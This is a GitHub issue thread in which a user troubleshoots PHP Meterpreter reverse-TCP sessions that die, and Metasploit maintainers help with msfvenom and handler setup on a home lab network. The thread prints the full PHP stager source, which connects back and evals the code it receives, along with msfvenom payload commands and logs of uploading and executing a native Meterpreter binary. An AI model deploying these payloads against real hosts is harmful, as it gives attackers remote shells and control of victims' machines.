Closed githubnan123 closed 7 years ago
I can't say for sure, but this reminds me of: https://github.com/rapid7/metasploit-payloads/issues/95
Hi @wchen-r7, i do not really know because the connection does get successfully established and is there for some seconds so not AS SOON as the session is found... But what about the commands? I mean how can i not have the "normal" commands like screenshot and sysinfo. Thanks for your time
And did you fix your issue by updating your php version,? Just to verify
PHP meterpreter doesn't necessarily have all the commands you see in Windows meterpreter. Personally, I would suggest you to upgrade to a platform-specific meterpreter (such as Windows or Linux) as soon as you get a session with the PHP meterpreter in order to access more functionalities.
My concern is more on the session dying part. I will at least try to see if I can reproduce this. I will let you know. Thanks!
Well thanks!! But if you get it reproduced, can you then answer these questions:
Thanks! I really appreciate your time :))
I can answer 1 and 3 for you now.
For question 1, normally it should not be downloading the file. If it does, that tells me the web server is probably serving the browser some kind of inappropriate content type header? This may not be a big issue though as long as the web server is parsing PHP code. If you see the PHP code from the browser, then that's bad.
For question 3, um... well, this requires the session to stay alive first. I normally just generate an executable from msfvenom (for example: ./msfvenom -p linux/meterpreter/reverse_tcp LHOST=[MY IP] LPORT=4444 -f elf -o payload.bin
), use the upload command to upload this binary to a directory you can write to, and then use the execute command to run it.
There is definitely more than one way to upgrade. If you are attacking Windows, you can also use the exploits/multi/script/web_delivery to upgrade to a different meterpreter.
1
tends to mean that the target web server isn't configured to run .php
files with the PHP interpreter. This will happen if you upload a .php
file to an IIS server running .NET, for example.
Well, at least it seems to work even though that the browser it downloading the content(I am using chrome on the victim machine). @OJ you mentioned something about configure the server to run php? I simply uploaded the file to /var/www/html/ on my Linux. Should that not work?
@wchen-r7, is this a good answer to 3 - http://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/ ?
(Reminder: I am not asking you because I am too lazy to try it, I am just not home yet )
The content of the generated .php file located in www/html/ is:
/*<?php /**/ error_reporting(0); $ip = '192.168.0.186'; $port = 6666; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();
Thanks so much for your time!!
@nichlaspro That script is good for upgrading from a shell to a Meterpreter. You actually have a different scenario: You're switching from Meterpreter to Meterpreter.
You cannot go from meterpreter to meterpreter right? :/ That just confused me a little.. In the videos i have seen about going from shell to meterpreter they end up having the commands available like screenshot, which is what i want too.
Update: Ahhh i currently only have php-meterpreter and what i need is a platform-spcific-meterpreter in order to make the wanted commands available, i think i got the point now! But how can i upload another payload using that php client. I mean i have used php and not exe for a reason. What i can think of would be to make an exe payload using windows/meterpreter but php/meterpreter does not have any commands that can upload it to the victim pc and execute it so kinda hard to get to work i think...
Hi @nichlaspro, I tried to look into this issue, and I'm not reproducing the problem.
The following log shows what I did. Basically, I got a session with php/meterpreter/reverse_tcp, and I waited for about 2 minutes:
msf exploit(handler) > date
[*] exec: date
Thu Dec 1 15:38:07 CST 2016
msf exploit(handler) > curl -s http://192.168.146.184/test.php
[*] exec: curl -s http://192.168.146.184/test.php
[*] Sending stage (34117 bytes) to 192.168.146.184
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.184:54134) at 2016-12-01 15:38:17 -0600
^CInterrupt: use the 'exit' command to quit
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux www-data (33) @ sinn3r-virtual-machine 192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)
msf exploit(handler) > date
[*] exec: date
Thu Dec 1 15:40:02 CST 2016
msf exploit(handler) >
However, just because I'm not able to reproduce, doesn't mean the bug doesn't exist. If you'd like, please provide me with some target info, such as: OS, version of the OS, what web server, PHP version, etc. So I can recreate the test environment as close as possible.
@nichlaspro Also, here is an example of how you could switch from a PHP meterpreter shell to a Linux native. I'll be using 192.168.146.1 as an example for the attacker's IP:
./msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.146.1 lport=4444 -f elf -o elf.bin
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux www-data (33) @ sinn3r-virtual-machine 192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)
meterpreter > cd /tmp
meterpreter > upload elf.bin
[*] uploading : elf.bin -> elf.bin
[*] uploaded : elf.bin -> elf.bin
meterpreter > execute -f "chmod +x elf.bin"
meterpreter > execute -f "/tmp/elf.bin"
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
Process 6032 created.
[*] Sending stage (1495599 bytes) to 192.168.146.184
[*] Meterpreter session 2 opened (192.168.146.1:4444 -> 192.168.146.184:54136) at 2016-12-01 15:46:41 -0600
meterpreter >
The second session should be the native meterpreter:
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux www-data (33) @ sinn3r-virtual-machine 192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)
2 meterpreter x86/linux uid=33, gid=33, euid=33, egid=33, suid=33, sgid=33 @ sinn3r-virtual-machine 192.168.146.1:4444 -> 192.168.146.184:54136 (192.168.146.184)
Also, please note that since we are on a bug tracking system, in here we need to stay on topic for the bug (of your session dying). If you need further training on Metasploit, please use our community website, where there is also Metasploit devs assisting. Thanks! :-)
Hi again! Thank you so much - Now i got an idea about to to upgrade the shell but look. I will now show you exactly what i do:
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=4444 R > /root/Desktop/thisisphp.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 949 bytes
root@kali:~# mv /root/Desktop/thisisphp.php /var/www/html/
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.13.1-dev ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.186:4444
[*] Starting the payload handler...
[*] Sending stage (34117 bytes) to 192.168.0.186
[*] Meterpreter session 1 opened (192.168.0.186:4444 -> 192.168.0.186:35456) at 2016-12-02 09:11:46 -0500
meterpreter > sessions
[-] Unknown command: sessions.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.186 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.186:4444
[*] Starting the payload handler...
[*] Sending stage (34117 bytes) to 192.168.0.197
[*] Meterpreter session 2 opened (192.168.0.186:4444 -> 192.168.0.197:49625) at 2016-12-02 09:13:58 -0500
[*] Sending stage (34117 bytes) to 192.168.0.197
meterpreter > cd
[-] Unknown command: cd.
meterpreter > cd /tmp
[-] Unknown command: cd.
[-] Meterpreter session 2 is not valid and will be closed
[*] 192.168.0.197 - Meterpreter session 2 closed.
meterpreter >
So here are my final questions(i guess) that cover the still ongoing issues.
On my windows pc it is downloading the file instead of just showing the content and i have to type the port in order to even make it start downloading, is that optimal? Look: https://s18.postimg.org/4hkabwxjt/look.png
So now the download of the php has started and a meterpreter session has been opened but again it was only up for about 10-20 seconds before it closed. Can that have something to do with this weirdness upon connecting to the php file on my windows pc? How can i fix this then?
As you can see i tried to use the cd command in the meterpreter but then it said that it is an unknown command? I am really doing the exact same thing as other people but it just does not seem to work? (sad story)
Something looks very wrong to me, can you help? That would really make my day :) (i am using chrome on my windows 8 machine and php version 7.0.12-1 on my linux btw i have not started any services or anything) Thanks, your time is much appreciated
Hi @nichlaspro,
For question 1: The URL looks a little weird for me. You are connecting to http://192.168.0.186:4444/thisisphp.php
.... so does that mean your web server is listening on port 4444? Normally web servers listen on port 80, so you would call your PHP meterpreter like this: http://192.168.0.186/thisisphp.php
. Could you please clarify on that a little?
For question 2: I don't know for sure, because I'm unable to reproduce this problem. It works fine on my end, and I also tested it on PHP 7. Is it possible you're not on the latest master? Could you please try git clone https://github.com/rapid7/metasploit-framework.git
and use that Metasploit Framework instead? That should give you the latest.
For question 3: Yeah, so when you receive a meterpreter connection, framework has to load stdapi to get the commands. That looks like it didn't. That means the session was not valid for some reason. I think if question 2 is resolved, we should automatically resolve question 3 as well.
Okay first of all, thank you so much for taking time to help me! I know that it is not optimal that i have to write the port in the victim browser but whenever i do that the browser starts downloading the actual php file. When i do type 192.168.0.186/payloaddd.php in the victim browser, it says "This site can't be reached". Like if there is some sort of issue in making the php file reachable. I have moved the generated php file to /var/www/, which i think is what you should do but i does not seem to work.
I tried updating and the metasploit framework but it did not really seem to help much. Here is what i did:
root@kali:~# clone https://github.com/rapid7/metasploit-framework.git
bash: clone: command not found
root@kali:~# git clone https://github.com/rapid7/metasploit-framework.git
Cloning into 'metasploit-framework'...
remote: Counting objects: 382032, done.
remote: Compressing objects: 100% (99/99), done.
remote: Total 382032 (delta 45), reused 1 (delta 1), pack-reused 381932
Receiving objects: 100% (382032/382032), 282.55 MiB | 5.73 MiB/s, done.
Resolving deltas: 100% (277211/277211), done.
root@kali:~# sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=4444 R>payloaddd.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 949 bytes
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.13.1-dev ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set URIPATH /upload/payloaddd.php
URIPATH => /upload/payloaddd.php
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.186:4444
[*] Starting the payload handler...
[-] Exploit failed: Interrupt
[*] Exploit completed, but no session was created.
msf exploit(handler) > set uripath /
uripath => /
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.186:4444
[*] Starting the payload handler...
So nothing happened from then because when i typed in 192.168.0.186/payloaddd.php in the victim browser, it said "This site can't be reached". But when i typed 192.168.0.186:4444/payloaddd.php, the browser started downloading a php file and this is where the invalid session thing begins i think. Anyway, when i start msfconsole it says:
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
Can that have anything to do with why it is not working? Update to the last part: Just found out that it said "failed to connect when start msfconsole because that i had not started the postgresql service... Anyway, that does not solve the problem about php and all that.
Hi @nichlaspro, after you clone Metasploit Framework, make sure you cd to the directory, and then execute ./msfconsole
, and not msfconsole
. I suspect there are two different Frameworks installed on the machine.
You are right, there are two. Let me just try to fix some installations errors and then i will see what the outcome is :)))
Okay so i successfully isntalled it and mounted it from home/metasploit-framework and then ran ./msfconsole. Then i set up the lhost and port, payload, and exploited... but now i tried it on the actual attacker machine(linux) where i typed the URL 192.168.0.186/payloaddd.php and firefox said this
Unable to connect
Firefox can't establish a connection to the server at 192.168.0.186. The site could be temporarily unavailable or too busy. Try again in a few moments. If you are unable to load any pages, check your computer's network connection. If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.
Again the payload php file is located in /var/www/. What is going on?
What i did:
Use `bundle show [gemname]` to see where a bundled gem is installed.
Post-install message from aruba:
Use on ruby 1.8.7
* Make sure you add something like that to your `Gemfile`. Otherwise you will
get cucumber > 2 and this will fail on ruby 1.8.7
gem 'cucumber', '~> 1.3.20'
With aruba >= 1.0 there will be breaking changes. Make sure to read https://github.com/cucumber/aruba/blob/master/History.md for 1.0.0
root@kali:~/metasploit-framework# ./msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.13.4-dev-f45b0e3 ]
+ -- --=[ 1607 exploits - 914 auxiliary - 276 post ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler/
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.0.186:4444
[*] Starting the payload handler...
Thanks again
@nichlaspro The reason you are able to connect to 4444 is because that is the port the handler is listening on. When you connect to it, the handler assumes that it has been contacted by the stager and give you the meterpreter stage. This is not what you want.
First thing you need to verify is that you are actually able to connect to the web server. Make sure you can connect to http://192.168.0.186. You should receive something like "It works!" or a GET request in the HTTP server log. When that is done, placing the PHP file in the /var/www/ directory and calling it from the browser is straight forward.
If you are not able to connect to the web server in the first place, I am afraid it is not a Metasploit issue but rather something related to your web server setup.
How to mark this as solved?
just click "Close" where you respond.
Closed for ya :-)
Steps to reproduce
How'd you do it?
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=443 -f raw > /root/var/www/html/test.php
msfconsole
use exploit/multi/handler / set payload php/meterpreter/reverse_tcp
set LHOST 192.168.0.186 / set LPORT 443
exploit
Then the victim(192.168.0.197) connects to 192.168.0.186:443/test.php Btw is the victim pc supposed to start a download? Because whenever i connect to this site, the pc starts downloading "test.php"
Expected behavior
What should happen? I should see the connection and be able to use commands like sysinfo and screenshot etc. The session should proably last longer than 15 sec :/
Current behavior
I DO see a new session and it open but here are the issues: i do not have the normal meterpreter commands like screenshot, sysinfo etc. but these instead: Core Commands **=============
And the session only lasts for about 15 sec(my focus is still at the meterpreter commands) It says Meterpreter session .. closed. Reason: Died all the time too And then i wanted to see what would happen if i used the command machine_id but then it said the it failed because the current session is closed and that was after 5 sec... Anyway, i am still most concerned about why i do not have the "normal" meterpreter commands.
System stuff
Kali Linux 2016.2
Metasploit version
4.13.1-dev 4.13.1-dev
How can i fix this? Thanks! Help is much appreciated!!